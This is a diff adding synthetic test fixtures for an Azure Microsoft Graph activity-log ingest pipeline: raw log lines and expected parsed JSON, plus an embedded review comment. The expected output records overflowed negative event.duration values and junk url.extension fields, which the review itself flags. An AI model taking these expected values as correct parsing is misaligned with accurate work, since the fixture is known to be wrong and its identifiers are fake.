User.Read.All","scopes":null,"servicePrincipalId":"f2aq4c71-31e3-5066-92g3-4b3dfbav50f0","signInActivityId":"sign-in_ActivityId","tenantId":"a140785b-418d-4344-a4ec-8e9648919gdb","timeGenerated":"2024-03-07T11:47:00.6442361Z","tokenIssuedAt":"2024-03-07T11:42:00Z","userAgent":"python-requests/2.27.1","userId":null,"wids":"1997b4d3-0g8d-90cb-bhj8-d89n3121e90"},"resourceId":"/TENANTS/A140785B-418D-4344-A4EC-8E9648919GDB/PROVIDERS/MICROSOFT.AADIAM","resultSignature":"200","tenantId":"a140785b-418d-4344-a4ec-8e9648919gdb","time":"2024-03-07T11:47:00.6442361Z"} +{"Level":4,"callerIpAddress":"81.2.69.143","category":"MicrosoftGraphActivityLogs","correlationId":"f7739jk0-e6d1-4e3f-985a-64937fbge367","durationMs":453011,"location":"Germany West Central","operationName":"Microsoft Graph 
Activity","operationVersion":"v1.0","properties":{"apiVersion":"v1.0","appId":"a5a68e12-268a-3c91-a5e2-b9254e67hb29","atContent":"","clientAuthMethod":"2","clientRequestId":"2fe56790-a848-4c83-9d2c-5675972aejk9","durationMs":453011,"identityProvider":"https://sts.windows.net/aa30985b-427d-4434-b4dc-8f9040719adb/","ipAddress":"81.2.69.143","location":"Germany West Central","operationId":"f7739jk0-e6d1-4e3f-985a-64937fbge367","requestId":"f7739jk0-e6d1-4e3f-985a-64937fbge367","requestMethod":"GET","requestUri":"https://graph.microsoft.com/v1.0/me/photos/96x96/$value","responseSizeBytes":294,"responseStatusCode":404,"roles":null,"scopes":"email openid Organization.Read.All Policy.ReadWrite.ApplicationConfiguration profile User.Read","servicePrincipalId":null,"signInActivityId":"sign-in_ActivityId","tenantId":"aa30985b-427d-4434-b4dc-8f9040719adb","timeGenerated":"2024-03-07T10:35:31.9597832Z","tokenIssuedAt":"2024-03-07T10:30:30Z","userAgent":"","userId":"b37ec517-0a34-4266-b627-f7bb0d679d70","wids":"1997b4d3-0g8d-90cb-bhj5-d80n3122e98 1997b4d3-0f8d-76cb-bhj5-d80n3122e98"},"resourceId":"/TENANTS/AA30985B-427D-4434-B4DC-8F9040719ADB/PROVIDERS/MICROSOFT.AADIAM","resultSignature":"404","tenantId":"aa30985b-427d-4434-b4dc-8f9040719adb","time":"2024-03-07T10:35:31.9597832Z"} +{"Level":4,"callerIpAddress":"81.2.69.144","category":"MicrosoftGraphActivityLogs","correlationId":"f7739da0-e6d1-4e3f-875a-64934fbge347","durationMs":16688471,"location":"UK South","operationName":"Microsoft Graph Activity","operationVersion":"beta","properties":{"apiVersion":"beta","appId":"a5a68e12-268a-3c91-a5f2-b9254e67hb28","atContent":"","clientAuthMethod":"0","clientRequestId":"2fe56789-a848-4c93-9s2c-5675972aghk9","durationMs":16688471,"identityProvider":null,"ipAddress":"81.2.69.144","location":"UK 
South","operationId":"f7739da0-e6d1-4e3f-875a-64934fbge347","requestId":"f7739da0-e6d1-4e3f-875a-64934fbge347","requestMethod":"GET","requestUri":"https://graph.microsoft.com/beta//users/7ef3c2ad-d52l-4a89-8cf9-c30178181027/photos/48x48/$value","responseSizeBytes":0,"responseStatusCode":404,"roles":null,"scopes":"AdministrativeUnit.ReadWrite.All AuditLog.Read.All Directory.AccessAsUser.All Directory.Write.Restricted email openid Organization.Read.All Policy.ReadWrite.Authorization profile User.EnableDisableAccount.All User.ReadWrite.All","servicePrincipalId":null,"signInActivityId":"signin_ActivityId","tenantId":"ab47545b-420e-46fg-c4dc-8f7697k1aadb","timeGenerated":"2024-03-07T16:42:22.84914Z","tokenIssuedAt":"2024-03-07T16:37:20Z","userAgent":"","userId":"285e0849-a706-4a9a-9eb1-f4e21cc78793","wids":"1997b4d3-0g8d-90cb-bhj5-d80n3122e98 1997b4d3-0g8d-90cb-bhj5-d80n3122e99 1997b4d3-0g8d-90cb-bhj5-d80n3122e80 1997b4d3-0g8d-90cb-bhj5-d80n3122e83"},"resourceId":"/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM","resultSignature":"404","tenantId":"ab47545b-420e-46fg-c4dc-8f7697k1aadb","time":"2024-03-07T16:42:22.8491400Z"} +{"Level":4,"callerIpAddress":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","category":"MicrosoftGraphActivityLogs","correlationId":"f7749da0-e6g1-4f3f-975a-64937fbge347","durationMs":846544,"location":"UK South","operationName":"Microsoft Graph Activity","operationVersion":"beta","properties":{"apiVersion":"beta","appId":"a5a68e32-269a-3c91-a5e2-b9254e67hb29","atContent":"","clientAuthMethod":"0","clientRequestId":"2fe56789-a848-4c93-9d2d-5675972ardk9","durationMs":846544,"identityProvider":null,"ipAddress":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","location":"UK 
South","operationId":"f7749da0-e6g1-4f3f-975a-64937fbge347","requestId":"f7749da0-e6g1-4f3f-975a-64937fbge347","requestMethod":"GET","requestUri":"https://graph.microsoft.com/beta/devices?$select=displayName,id,deviceId\\u0026$search=%22displayName:a%22\\u0026$top=30","responseSizeBytes":0,"responseStatusCode":200,"roles":null,"scopes":"AccessReview.ReadWrite.All AuditLog.Read.All ChangeManagement.Read.All ConsentRequest.Create ConsentRequest.Read ConsentRequest.ReadApprove.All ConsentRequest.ReadWrite.All CustomSecAttributeAuditLogs.Read.All Directory.AccessAsUser.All Directory.Read.All Directory.ReadWrite.All Directory.Write.Restricted DirectoryRecommendations.Read.All DirectoryRecommendations.ReadWrite.All email EntitlementManagement.Read.All Group.ReadWrite.All IdentityProvider.ReadWrite.All IdentityRiskEvent.ReadWrite.All IdentityRiskyServicePrincipal.ReadWrite.All IdentityRiskyUser.ReadWrite.All IdentityUserFlow.Read.All LifecycleWorkflows.ReadWrite.All openid Policy.Read.All Policy.Read.IdentityProtection Policy.ReadWrite.AuthenticationFlows Policy.ReadWrite.AuthenticationMethod Policy.ReadWrite.ConditionalAccess Policy.ReadWrite.ExternalIdentities Policy.ReadWrite.IdentityProtection Policy.ReadWrite.MobilityManagement profile Reports.Read.All RoleManagement.ReadWrite.Directory RoleManagement.ReadWrite.Exchange SecurityEvents.ReadWrite.All TrustFrameworkKeySet.Read.All User.Export.All User.ReadWrite.All UserAuthenticationMethod.ReadWrite.All","servicePrincipalId":null,"signInActivityId":"signin_Activity-Id","tenantId":"ab47545b-420e-46fg-c4dc-8f7697k1aadb","timeGenerated":"2024-03-07T16:42:12.0485843Z","tokenIssuedAt":"2024-03-07T16:36:51Z","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0","userId":"285e0849-a706-4a9a-9eb1-f4e21cc78793","wids":"a207b4d3-0g8d-90cb-bhj5-d80n3122e67 a207b4d3-0g8d-90cb-bhj5-d80n3122e69 
a207b4d3-0g8d-90cb-bhj5-d80n3122e89"},"resourceId":"/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM","resultSignature":"200","tenantId":"ab47545b-420e-46fg-c4dc-8f7697k1aadb","time":"2024-03-07T16:42:12.0485843Z"} +{"Level":4,"callerIpAddress":"81.2.69.143","category":"MicrosoftGraphActivityLogs","correlationId":"f7839da0-e7d1-4e4f-985a-64937fbge347","durationMs":1100725,"location":"France Central","operationName":"Microsoft Graph Activity","operationVersion":"v1.0","properties":{"apiVersion":"v1.0","appId":"a5a68e32-269a-3c91-a5e2-b9254e67hb29","atContent":"","clientAuthMethod":"2","clientRequestId":"2fe58790-a848-4a93-9d2c-5645972aejk9","durationMs":1100725,"identityProvider":"https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/","ipAddress":"81.2.69.143","location":"France Central","operationId":"f7839da0-e7d1-4e4f-985a-64937fbge347","requestId":"f7839da0-e7d1-4e4f-985a-64937fbge347","requestMethod":"GET","requestUri":"https://graph.microsoft.com/v1.0/directoryRoles","responseSizeBytes":4300,"responseStatusCode":200,"roles":"Application.Read.All Domain.Read.All GroupMember.Read.All LicenseAssignment.ReadWrite.All Organization.Read.All Policy.Read.ConditionalAccess RoleManagement.Read.Directory Team.ReadBasic.All TeamsTab.Create TeamsTab.Read.All TeamsTab.ReadWrite.All User.Read.All","scopes":null,"servicePrincipalId":"f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg","signInActivityId":"sign-in_ActivityId","tenantId":"ab30785b-417f-42a4-b5dc-8f9051718acb","timeGenerated":"2024-03-07T10:24:44.7939418Z","tokenIssuedAt":"2024-03-07T10:19:44Z","userAgent":"","userId":null,"wids":"a207b4d3-0g8d-90cb-bhj5-d80n3121e69"},"resourceId":"/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM","resultSignature":"200","tenantId":"ab30785b-417f-42a4-b5dc-8f9051718acb","time":"2024-03-07T10:24:44.7939418Z"} \ No newline at end of file 
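Review bot: The `durationMs` values in this fixture (462680, 453011, 16688471, 846544, 1100725) expose a 32-bit overflow in the millisecond-to-nanosecond conversion: the expected output generated from it records `event.duration` as `-1176467968` for 462680 ms, `2039433920` for 453011 ms and `-1771912256` for 16688471 ms, whereas 462680 ms is 462680000000 ns, which does not fit in an int. The conversion lives in the data stream's ingest pipeline rather than in this hunk, so its exact form is inferred; it should multiply in long arithmetic (e.g. `(long) durationMs * 1000000L`) and the expected file be regenerated before either is accepted. The same expected output also carries `url.extension` values such as `0/organization/a140785b-...` and `0/me/photos/96x96/$value`, presumably a URI parser treating the dot in `v1.0` as an extension separator; dropping `url.extension` after parsing would keep that field from holding junk. On the positive side, the tenant, app and role identifiers contain non-hex characters (`g`, `h`, `j`, `k`) and the addresses are well-known test ranges, so the fixture is clearly synthetic.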
diff --git a/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json
new file mode 100644
index 00000000000..ce88adad1e6
--- /dev/null
+++ b/packages/azure/data_stream/graphactivitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json
@@ -0,0 +1,708 @@ +{ + "expected": [ + { + "@timestamp": "2024-03-07T11:47:00.644Z", + "azure": { + "correlation_id": "f7739da0-e6d1-4e3f-985a-64937fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "v1.0", + "properties": { + "api_version": "v1.0", + "app_id": "a5a68e12-268a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 2, + "client_request_id": "2fe56789-a848-4c93-9d2c-5675972aejk9", + "identity_provider": "https://sts.windows.net/a140785b-418d-4344-a4ec-8e9648919gdb/", + "operation_id": "f7739da0-e6d1-4e3f-985a-64937fbge347", + "roles": [ + "Organization.Read.All", + "User.Read.All" + ], + "service_principal_id": "f2aq4c71-31e3-5066-92g3-4b3dfbav50f0", + "sign_in_activity_id": "sign-in_ActivityId", + "time_generated": "2024-03-07T11:47:00.644Z", + "token_issued_at": "2024-03-07T11:42:00.000Z", + "wids": [ + "1997b4d3-0g8d-90cb-bhj8-d89n3121e90" + ] + }, + "result_signature": "200" + }, + "resource": { + "id": "/TENANTS/A140785B-418D-4344-A4EC-8E9648919GDB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "a140785b-418d-4344-a4ec-8e9648919gdb" + }, + "client": { + "geo": { + "continent_name": "Europe", + "country_iso_code": "NO", + "country_name": "Norway", + "location": { + "lat": 62.0, + "lon": 10.0 + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, + "cloud": { + "account": { + "id": "a140785b-418d-4344-a4ec-8e9648919gdb" + }, + "provider": "azure", + "region": "West Europe", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "West Europe" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": -1176467968, + "kind": "event", + "original": 
"{\"Level\":4,\"callerIpAddress\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7739da0-e6d1-4e3f-985a-64937fbge347\",\"durationMs\":462680,\"location\":\"West Europe\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"v1.0\",\"properties\":{\"apiVersion\":\"v1.0\",\"appId\":\"a5a68e12-268a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"2\",\"clientRequestId\":\"2fe56789-a848-4c93-9d2c-5675972aejk9\",\"durationMs\":462680,\"identityProvider\":\"https://sts.windows.net/a140785b-418d-4344-a4ec-8e9648919gdb/\",\"ipAddress\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"location\":\"West Europe\",\"operationId\":\"f7739da0-e6d1-4e3f-985a-64937fbge347\",\"requestId\":\"f7739da0-e6d1-4e3f-985a-64937fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/v1.0/organization/a140785b-418d-4344-a4ec-8e9648919gdb?$select=Id,DisplayName,CreatedDateTime,ReplicationScope,Country,CountryLetterCode,DataBoundary\",\"responseSizeBytes\":364,\"responseStatusCode\":200,\"roles\":\"Organization.Read.All User.Read.All\",\"scopes\":null,\"servicePrincipalId\":\"f2aq4c71-31e3-5066-92g3-4b3dfbav50f0\",\"signInActivityId\":\"sign-in_ActivityId\",\"tenantId\":\"a140785b-418d-4344-a4ec-8e9648919gdb\",\"timeGenerated\":\"2024-03-07T11:47:00.6442361Z\",\"tokenIssuedAt\":\"2024-03-07T11:42:00Z\",\"userAgent\":\"python-requests/2.27.1\",\"userId\":null,\"wids\":\"1997b4d3-0g8d-90cb-bhj8-d89n3121e90\"},\"resourceId\":\"/TENANTS/A140785B-418D-4344-A4EC-8E9648919GDB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"200\",\"tenantId\":\"a140785b-418d-4344-a4ec-8e9648919gdb\",\"time\":\"2024-03-07T11:47:00.6442361Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7739da0-e6d1-4e3f-985a-64937fbge347", + "method": "GET" + }, + "response": { + "bytes": 364, + "status_code": 200 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + 
"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + ] + }, + "source": { + "geo": { + "continent_name": "Europe", + "country_iso_code": "NO", + "country_name": "Norway", + "location": { + "lat": 62.0, + "lon": 10.0 + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "extension": "0/organization/a140785b-418d-4344-a4ec-8e9648919gdb", + "original": "https://graph.microsoft.com/v1.0/organization/a140785b-418d-4344-a4ec-8e9648919gdb?$select=Id,DisplayName,CreatedDateTime,ReplicationScope,Country,CountryLetterCode,DataBoundary", + "path": "/v1.0/organization/a140785b-418d-4344-a4ec-8e9648919gdb", + "query": "$select=Id,DisplayName,CreatedDateTime,ReplicationScope,Country,CountryLetterCode,DataBoundary", + "scheme": "https" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Python Requests", + "original": "python-requests/2.27.1", + "version": "2.27" + } + }, + { + "@timestamp": "2024-03-07T10:35:31.959Z", + "azure": { + "correlation_id": "f7739jk0-e6d1-4e3f-985a-64937fbge367", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "v1.0", + "properties": { + "api_version": "v1.0", + "app_id": "a5a68e12-268a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 2, + "client_request_id": "2fe56790-a848-4c83-9d2c-5675972aejk9", + "identity_provider": "https://sts.windows.net/aa30985b-427d-4434-b4dc-8f9040719adb/", + "operation_id": "f7739jk0-e6d1-4e3f-985a-64937fbge367", + "scopes": [ + "email", + "openid", + "Organization.Read.All", + "Policy.ReadWrite.ApplicationConfiguration", + "profile", + "User.Read" + ], + "sign_in_activity_id": "sign-in_ActivityId", + "time_generated": "2024-03-07T10:35:31.959Z", + "token_issued_at": "2024-03-07T10:30:30.000Z", + "wids": [ + "1997b4d3-0g8d-90cb-bhj5-d80n3122e98", + "1997b4d3-0f8d-76cb-bhj5-d80n3122e98" + ] + }, + "result_signature": "404" + 
}, + "resource": { + "id": "/TENANTS/AA30985B-427D-4434-B4DC-8F9040719ADB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "aa30985b-427d-4434-b4dc-8f9040719adb" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143", + "user": { + "id": "b37ec517-0a34-4266-b627-f7bb0d679d70" + } + }, + "cloud": { + "account": { + "id": "aa30985b-427d-4434-b4dc-8f9040719adb" + }, + "provider": "azure", + "region": "Germany West Central", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "Germany West Central" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": 2039433920, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.143\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7739jk0-e6d1-4e3f-985a-64937fbge367\",\"durationMs\":453011,\"location\":\"Germany West Central\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"v1.0\",\"properties\":{\"apiVersion\":\"v1.0\",\"appId\":\"a5a68e12-268a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"2\",\"clientRequestId\":\"2fe56790-a848-4c83-9d2c-5675972aejk9\",\"durationMs\":453011,\"identityProvider\":\"https://sts.windows.net/aa30985b-427d-4434-b4dc-8f9040719adb/\",\"ipAddress\":\"81.2.69.143\",\"location\":\"Germany West Central\",\"operationId\":\"f7739jk0-e6d1-4e3f-985a-64937fbge367\",\"requestId\":\"f7739jk0-e6d1-4e3f-985a-64937fbge367\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/v1.0/me/photos/96x96/$value\",\"responseSizeBytes\":294,\"responseStatusCode\":404,\"roles\":null,\"scopes\":\"email openid Organization.Read.All 
Policy.ReadWrite.ApplicationConfiguration profile User.Read\",\"servicePrincipalId\":null,\"signInActivityId\":\"sign-in_ActivityId\",\"tenantId\":\"aa30985b-427d-4434-b4dc-8f9040719adb\",\"timeGenerated\":\"2024-03-07T10:35:31.9597832Z\",\"tokenIssuedAt\":\"2024-03-07T10:30:30Z\",\"userAgent\":\"\",\"userId\":\"b37ec517-0a34-4266-b627-f7bb0d679d70\",\"wids\":\"1997b4d3-0g8d-90cb-bhj5-d80n3122e98 1997b4d3-0f8d-76cb-bhj5-d80n3122e98\"},\"resourceId\":\"/TENANTS/AA30985B-427D-4434-B4DC-8F9040719ADB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"404\",\"tenantId\":\"aa30985b-427d-4434-b4dc-8f9040719adb\",\"time\":\"2024-03-07T10:35:31.9597832Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7739jk0-e6d1-4e3f-985a-64937fbge367", + "method": "GET" + }, + "response": { + "bytes": 294, + "status_code": 404 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "81.2.69.143" + ], + "user": [ + "b37ec517-0a34-4266-b627-f7bb0d679d70" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "extension": "0/me/photos/96x96/$value", + "original": "https://graph.microsoft.com/v1.0/me/photos/96x96/$value", + "path": "/v1.0/me/photos/96x96/$value", + "scheme": "https" + }, + "user": { + "id": "b37ec517-0a34-4266-b627-f7bb0d679d70" + } + }, + { + "@timestamp": "2024-03-07T16:42:22.849Z", + "azure": { + "correlation_id": "f7739da0-e6d1-4e3f-875a-64934fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "beta", + "properties": { + "api_version": "beta", + "app_id": "a5a68e12-268a-3c91-a5f2-b9254e67hb28", + 
"client_auth_method": 0, + "client_request_id": "2fe56789-a848-4c93-9s2c-5675972aghk9", + "operation_id": "f7739da0-e6d1-4e3f-875a-64934fbge347", + "scopes": [ + "AdministrativeUnit.ReadWrite.All", + "AuditLog.Read.All", + "Directory.AccessAsUser.All", + "Directory.Write.Restricted", + "email", + "openid", + "Organization.Read.All", + "Policy.ReadWrite.Authorization", + "profile", + "User.EnableDisableAccount.All", + "User.ReadWrite.All" + ], + "sign_in_activity_id": "signin_ActivityId", + "time_generated": "2024-03-07T16:42:22.849Z", + "token_issued_at": "2024-03-07T16:37:20.000Z", + "wids": [ + "1997b4d3-0g8d-90cb-bhj5-d80n3122e98", + "1997b4d3-0g8d-90cb-bhj5-d80n3122e99", + "1997b4d3-0g8d-90cb-bhj5-d80n3122e80", + "1997b4d3-0g8d-90cb-bhj5-d80n3122e83" + ] + }, + "result_signature": "404" + }, + "resource": { + "id": "/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "ab47545b-420e-46fg-c4dc-8f7697k1aadb" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144", + "user": { + "id": "285e0849-a706-4a9a-9eb1-f4e21cc78793" + } + }, + "cloud": { + "account": { + "id": "ab47545b-420e-46fg-c4dc-8f7697k1aadb" + }, + "provider": "azure", + "region": "UK South", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "UK South" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": -1771912256, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.144\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7739da0-e6d1-4e3f-875a-64934fbge347\",\"durationMs\":16688471,\"location\":\"UK South\",\"operationName\":\"Microsoft Graph 
Activity\",\"operationVersion\":\"beta\",\"properties\":{\"apiVersion\":\"beta\",\"appId\":\"a5a68e12-268a-3c91-a5f2-b9254e67hb28\",\"atContent\":\"\",\"clientAuthMethod\":\"0\",\"clientRequestId\":\"2fe56789-a848-4c93-9s2c-5675972aghk9\",\"durationMs\":16688471,\"identityProvider\":null,\"ipAddress\":\"81.2.69.144\",\"location\":\"UK South\",\"operationId\":\"f7739da0-e6d1-4e3f-875a-64934fbge347\",\"requestId\":\"f7739da0-e6d1-4e3f-875a-64934fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/beta//users/7ef3c2ad-d52l-4a89-8cf9-c30178181027/photos/48x48/$value\",\"responseSizeBytes\":0,\"responseStatusCode\":404,\"roles\":null,\"scopes\":\"AdministrativeUnit.ReadWrite.All AuditLog.Read.All Directory.AccessAsUser.All Directory.Write.Restricted email openid Organization.Read.All Policy.ReadWrite.Authorization profile User.EnableDisableAccount.All User.ReadWrite.All\",\"servicePrincipalId\":null,\"signInActivityId\":\"signin_ActivityId\",\"tenantId\":\"ab47545b-420e-46fg-c4dc-8f7697k1aadb\",\"timeGenerated\":\"2024-03-07T16:42:22.84914Z\",\"tokenIssuedAt\":\"2024-03-07T16:37:20Z\",\"userAgent\":\"\",\"userId\":\"285e0849-a706-4a9a-9eb1-f4e21cc78793\",\"wids\":\"1997b4d3-0g8d-90cb-bhj5-d80n3122e98 1997b4d3-0g8d-90cb-bhj5-d80n3122e99 1997b4d3-0g8d-90cb-bhj5-d80n3122e80 1997b4d3-0g8d-90cb-bhj5-d80n3122e83\"},\"resourceId\":\"/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"404\",\"tenantId\":\"ab47545b-420e-46fg-c4dc-8f7697k1aadb\",\"time\":\"2024-03-07T16:42:22.8491400Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7739da0-e6d1-4e3f-875a-64934fbge347", + "method": "GET" + }, + "response": { + "bytes": 0, + "status_code": 404 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "285e0849-a706-4a9a-9eb1-f4e21cc78793" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + 
"country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "original": "https://graph.microsoft.com/beta//users/7ef3c2ad-d52l-4a89-8cf9-c30178181027/photos/48x48/$value", + "path": "/beta//users/7ef3c2ad-d52l-4a89-8cf9-c30178181027/photos/48x48/$value", + "scheme": "https" + }, + "user": { + "id": "285e0849-a706-4a9a-9eb1-f4e21cc78793" + } + }, + { + "@timestamp": "2024-03-07T16:42:12.048Z", + "azure": { + "correlation_id": "f7749da0-e6g1-4f3f-975a-64937fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "beta", + "properties": { + "api_version": "beta", + "app_id": "a5a68e32-269a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 0, + "client_request_id": "2fe56789-a848-4c93-9d2d-5675972ardk9", + "operation_id": "f7749da0-e6g1-4f3f-975a-64937fbge347", + "scopes": [ + "AccessReview.ReadWrite.All", + "AuditLog.Read.All", + "ChangeManagement.Read.All", + "ConsentRequest.Create", + "ConsentRequest.Read", + "ConsentRequest.ReadApprove.All", + "ConsentRequest.ReadWrite.All", + "CustomSecAttributeAuditLogs.Read.All", + "Directory.AccessAsUser.All", + "Directory.Read.All", + "Directory.ReadWrite.All", + "Directory.Write.Restricted", + "DirectoryRecommendations.Read.All", + "DirectoryRecommendations.ReadWrite.All", + "email", + "EntitlementManagement.Read.All", + "Group.ReadWrite.All", + "IdentityProvider.ReadWrite.All", + "IdentityRiskEvent.ReadWrite.All", + "IdentityRiskyServicePrincipal.ReadWrite.All", + "IdentityRiskyUser.ReadWrite.All", + "IdentityUserFlow.Read.All", + "LifecycleWorkflows.ReadWrite.All", + "openid", + "Policy.Read.All", + "Policy.Read.IdentityProtection", + "Policy.ReadWrite.AuthenticationFlows", + 
"Policy.ReadWrite.AuthenticationMethod", + "Policy.ReadWrite.ConditionalAccess", + "Policy.ReadWrite.ExternalIdentities", + "Policy.ReadWrite.IdentityProtection", + "Policy.ReadWrite.MobilityManagement", + "profile", + "Reports.Read.All", + "RoleManagement.ReadWrite.Directory", + "RoleManagement.ReadWrite.Exchange", + "SecurityEvents.ReadWrite.All", + "TrustFrameworkKeySet.Read.All", + "User.Export.All", + "User.ReadWrite.All", + "UserAuthenticationMethod.ReadWrite.All" + ], + "sign_in_activity_id": "signin_Activity-Id", + "time_generated": "2024-03-07T16:42:12.048Z", + "token_issued_at": "2024-03-07T16:36:51.000Z", + "wids": [ + "a207b4d3-0g8d-90cb-bhj5-d80n3122e67", + "a207b4d3-0g8d-90cb-bhj5-d80n3122e69", + "a207b4d3-0g8d-90cb-bhj5-d80n3122e89" + ] + }, + "result_signature": "200" + }, + "resource": { + "id": "/TENANTS/AB47545B-420E-46FG-C4DC-8F7697K1AADB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "ab47545b-420e-46fg-c4dc-8f7697k1aadb" + }, + "client": { + "geo": { + "continent_name": "Europe", + "country_iso_code": "NO", + "country_name": "Norway", + "location": { + "lat": 62.0, + "lon": 10.0 + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "user": { + "id": "285e0849-a706-4a9a-9eb1-f4e21cc78793" + } + }, + "cloud": { + "account": { + "id": "ab47545b-420e-46fg-c4dc-8f7697k1aadb" + }, + "provider": "azure", + "region": "UK South", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "UK South" + } + }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": 435442688, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7749da0-e6g1-4f3f-975a-64937fbge347\",\"durationMs\":846544,\"location\":\"UK South\",\"operationName\":\"Microsoft Graph 
